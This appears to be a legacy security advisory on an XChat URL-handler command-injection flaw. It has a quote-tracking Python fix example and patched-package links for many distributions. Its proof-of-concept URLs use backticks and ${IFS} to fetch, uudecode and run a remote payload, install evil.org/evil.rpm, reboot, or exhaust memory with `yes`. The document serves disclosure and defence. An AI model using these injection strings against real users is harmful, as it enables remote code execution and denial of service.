COMMAND
xchat
SYSTEMS AFFECTED
xchat
PROBLEM
Zenith Parsec found the following. Just to show what we mean about
the possible danger, start Netscape and enter in xchat (in a
channel or query window) the following URL.
http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'
Right click on it, and select the Netscape (Existing) or Netscape
(New Window) option. Wait until the URL loads. In a shell on
your machine type
tail -2 ~/.bash_profile
echo You've been hax0red
echo --zen
(oops... should've been You\'ve been hax0red, but u get the idea)
Lucky it wasn't a script that was well written, and designed to
use script kiddie stuff to hack root or something, eh?
For the non-lazy and the lazy who were impressed by the quick
demo...
The hole is in the URL Handler section. Netscape (Existing)
causes XChat to run the command
netscape -remote 'openURL(%s)'
where the %s is replaced by the selected URL eg:
http://homepages.ihug.co.nz/~Sneuro/
causes the command
netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page. Netscape (Run New) causes XChat to run
the command netscape %s and so on.
Backticking and shell expansion. Imagine if someone types:
l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
with the (Existing) or (New Window) options and others that use
'openURL(%s)' type commands to start the program, you get:
netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
count the 's and u will see that at the 2nd `date` they are closed
and then reopened, so that `date` isn't escaped anymore... leaving
it free to run, which it does.
With the (Run New) type commands (that is command %s with no 's
around the %s) you get:
netscape http://www.altavista.com/?x=`date`y='`date`'
which has the 1st `date` unescaped (no 's around it) and so it
executes. In real life, though, it's unlikely anyone would click
on a URL like
http://`reboot`/'`reboot`'
Still, not all that useful, ha? Well, URLs can get
pretty long. For example, a cgi-bin call to something can get
quite long.
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10
compare that to:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1
quick glance... nothing wrong with it.
Well, you seem to have a limitation, in that putting spaces in
doesn't work, nor does redirection.
Well, you can put spaces in. The $IFS variable is probably set.
And who needs redirection, when you can do this:
http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
(For (Existing) or (New Window))
http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"
By the way, a way to exploit this that's not too blatant, if
you don't mind just DOS-ing the victim, is something like
http://drugs.org/just/say/`yes`
(warning, following said URL in xchat will eat all memory you are
allowed to eat on your system, and thus tends to crash
poorly-configured linux systems).
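The two handler templates quoted above and the "count the 's" reasoning, as an added example that is not part of the original advisory and is not XChat's own code: a small Python model fills the template the way the vulnerable versions did, reports which backtick substitutions a POSIX shell would actually run (a simplified quote tracker, ignoring here-docs and other shell syntax), shows why merely shell-quoting the URL is not a reliable fix, and builds an argv list so the handler can be started without any shell. The sample URLs are constructed from the advisory's `date` demonstration, and launch() is an assumed helper, not an XChat API.

```python
"""Added example (not from the original advisory or from XChat): model the
URL-handler templates, automate the advisory's "count the 's" check, and show
the fix of executing the handler without a shell."""
import shlex
import subprocess

# Handler templates exactly as the advisory quotes them.
HANDLER_EXISTING = "netscape -remote 'openURL(%s)'"
HANDLER_NEW = "netscape %s"

# Constructed sample URLs, modelled on the advisory's `date` demonstration.
SAMPLE_URL = "http://www.altavista.com/?x=`date`y='`date`'"
SAMPLE_URL_IFS = "http://example.invalid/?'`date${IFS}-u`'"   # ${IFS} stands in for a space


def live_substitutions(cmdline):
    """Return the bodies of the `...` substitutions a POSIX shell would run
    when handed cmdline.  Backticks are dead inside single quotes but live
    when bare or inside double quotes; a backslash escapes the next
    character.  Simplified tracker: no here-docs, no $(...) nesting."""
    live = []
    quote = None          # None, "'" or '"': the quote we are currently inside
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if quote == "'":
            if ch == "'":
                quote = None
        elif ch == "\\":
            i += 1                      # skip the escaped character
        elif ch in ("'", '"') and quote is None:
            quote = ch
        elif ch == '"' and quote == '"':
            quote = None
        elif ch == "`":
            end = cmdline.find("`", i + 1)
            if end == -1:
                break
            live.append(cmdline[i + 1:end])
            i = end
        i += 1
    return live


def naive_fill(template, url):
    """What the vulnerable versions did: textual %s replacement, then system()."""
    return template.replace("%s", url)


def quoted_fill(template, url):
    """Tempting but unreliable fix: shell-quote the URL and still use a shell.
    It works only when the template leaves %s bare; inside 'openURL(%s)' the
    added quotes close the template's own quotes and the backticks go live."""
    return template.replace("%s", shlex.quote(url))


def safe_argv(template, url):
    """Real fix: split the template into argv words first, then substitute the
    URL into the word carrying %s.  Handed to exec() without a shell, the URL
    is plain bytes in one argument and is never reparsed for `, ' or $IFS."""
    return [word.replace("%s", url) for word in shlex.split(template)]


def launch(template, url):
    """Start the handler the safe way (no shell).  Assumed helper, not XChat's API."""
    return subprocess.Popen(safe_argv(template, url))


if __name__ == "__main__":
    for tmpl in (HANDLER_EXISTING, HANDLER_NEW):
        for url in (SAMPLE_URL, SAMPLE_URL_IFS):
            cmd = naive_fill(tmpl, url)
            print(cmd)
            print("  live via system():", live_substitutions(cmd))
            print("  argv, no shell:   ", safe_argv(tmpl, url))
```

With the Existing template the first `date` sits inside the template's quotes and only the second is live; with the bare `netscape %s` template it is the first one, exactly as the advisory describes. quoted_fill() shows the trap of escaping for a shell you do not control: the Existing template already wraps %s in single quotes, so the quotes added by shlex.quote() cancel them and both substitutions become live. safe_argv() has no such dependency on the template's quoting, which is why "build argv, don't build a command line" is the durable fix.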
SOLUTION
It seems that this bug will only affect XChat versions 1.3.9 and
above, up to and including 1.4.2 (the devel series may also be
vulnerable, as there is no mention on the changelog page of this
bug.) (release 1.3.9 was the first to have editable URL handlers,
which seem to be the cause). Verified bug exists on [x]chat
1.5.5.
Version 1.2.1 of xchat does not appear to be vulnerable.
For Red Hat:
sparc: ftp://updates.redhat.com/6.2/sparc/xchat-1.4.0-2.sparc.rpm
alpha: ftp://updates.redhat.com/6.2/alpha/xchat-1.4.0-2.alpha.rpm
i386: ftp://updates.redhat.com/6.2/i386/xchat-1.4.0-2.i386.rpm
sources: ftp://updates.redhat.com/6.2/SRPMS/xchat-1.4.0-2.src.rpm
For Linux-Mandrake:
7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/xchat-1.4.2-4cl.i386.rpm
Just to chime in here, for distributions that haven't released an
update, the source for 1.4.2 is available on the author's website
for the impatient:
http://xchat.linuxpower.org/index.html
The latest stable release of debian is not vulnerable. Others:
http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.dsc
http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-all/xchat-common_1.4.3-0.1_all.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-gnome_1.4.3-0.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-text_1.4.3-0.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat_1.4.3-0.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-gnome_1.4.3-0.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-text_1.4.3-0.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/xchat_1.4.3-0.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-gnome_1.4.3-0.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-text_1.4.3-0.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/xchat_1.4.3-0.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-gnome_1.4.3-0.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-text_1.4.3-0.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat_1.4.3-0.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-gnome_1.4.3-0.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-text_1.4.3-0.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat_1.4.3-0.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-gnome_1.4.3-0.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-text_1.4.3-0.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat_1.4.3-0.1_sparc.deb
Slackware 7.1 does ship with xchat. It is not vulnerable.
An essential update is available immediately from Helix Code,
Inc. via the Helix GNOME Updater and from the following URLs.
For Caldera OpenLinux eDesktop 2.4 systems:
http://spidermonkey.helixcode.com/distributions/Caldera-2.4/xchat-1.4.3-0_helix_1.i386.rpm
For Debian GNU/Linux potato (2.2) and woody systems:
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat_1.4.3-helix1_i386.deb
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-common_1.4.3-helix1_all.deb
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-text_1.4.3-helix1_i386.deb
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-gnome_1.4.3-helix1_i386.deb
For LinuxPPC systems:
http://spidermonkey.helixcode.com/distributions/LinuxPPC/xchat-1.4.3-0_helix_1.ppc.rpm
For Linux Mandrake systems:
http://spidermonkey.helixcode.com/distributions/Mandrake/xchat-1.4.3-0mdk_helix_1.i586.rpm
For Red Hat Linux systems:
http://spidermonkey.helixcode.com/distributions/RedHat-6/xchat-1.4.3-0_helix_1.i386.rpm
For Solaris running on UltraSparc systems:
http://spidermonkey.helixcode.com/distributions/Solaris/xchat-1.4.3-0_helix_1.sparc64.rpm
For SuSE 6.3 systems:
http://spidermonkey.helixcode.com/distributions/SuSE/xchat-1.4.3-0_helix_1.i386.rpm
For SuSE 6.4 systems:
http://spidermonkey.helixcode.com/distributions/SuSE-6.4/xchat-1.4.3-0_helix_1.i386.rpm
For TurboLinux systems:
http://spidermonkey.helixcode.com/distributions/TurboLinux-6/xchat-1.4.3-0_helix_1.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 7.0: 7.0/RPMS/xchat-1.4.1-4mdk.i586.rpm
7.0/SRPMS/xchat-1.4.1-4mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/xchat-1.4.3.tgz
Users of Slackware 7.0, 7.1, and -current are urged to upgrade
to the xchat.tgz package available in the Slackware -current
branch:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/gtk/xchat.tgz
For TurboLinux:
ftp://ftp.turbolinux.com/pub/updates/6.0/xchat-1.4.3-1.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xchat-1.4.3-1.src.rpm
Note: You must rebuild and install the RPM if you choose to
download and install the SRPM. Simply installing the SRPM alone
WILL NOT CLOSE THE SECURITY HOLE.